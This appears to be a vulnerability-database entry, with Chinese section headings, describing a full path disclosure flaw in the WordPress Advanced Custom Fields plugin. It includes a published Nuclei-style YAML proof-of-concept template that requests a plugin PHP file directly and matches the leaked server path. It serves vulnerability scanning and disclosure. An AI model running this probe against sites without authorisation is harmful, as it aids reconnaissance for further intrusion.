漏洞描述
Advanced Custom Fields (ACF) for WordPress contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.
wp-acf-fpd: Advanced Custom Fields (ACF) - Full Path Disclosure
PoC代码[已公开]
id: wp-acf-fpd
info:
name: Advanced Custom Fields (ACF) - Full Path Disclosure
author: theamanrawat
severity: low
description: |
Advanced Custom Fields (ACF) for WordPress contains a full path disclosure vulnerability due to improper access restrictions in its source files, allowing unauthenticated attackers to retrieve full server paths and aiding exploitation.
impact: |
Attackers can obtain server file paths, aiding in further exploitation of the website.
reference:
- https://www.advancedcustomfields.com
metadata:
verified: true
max-requests: 1
public-www: "/wp-content/plugins/advanced-custom-fields/"
tags: debug,wordpress,wp,wp-plugin,acf,fpd
http:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-accordion.php'
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '/[a-zA-Z0-9_\-/]+/wp-content/plugins/advanced-custom-fields/includes/fields/class-acf-field-accordion\.php'
- type: word
part: content_type
words:
- 'text/html'
- type: status
status:
- 200
# digest: 4b0a00483046022100cb6b4757c52fb34d42eff50fbdd884f4ff670da1426075d8b24954370204763f022100a322d81347d58d3591709d0c31795635908d3f088572841868b67e139bbd0ed1:922c64590222798bb761d5b6d8e72950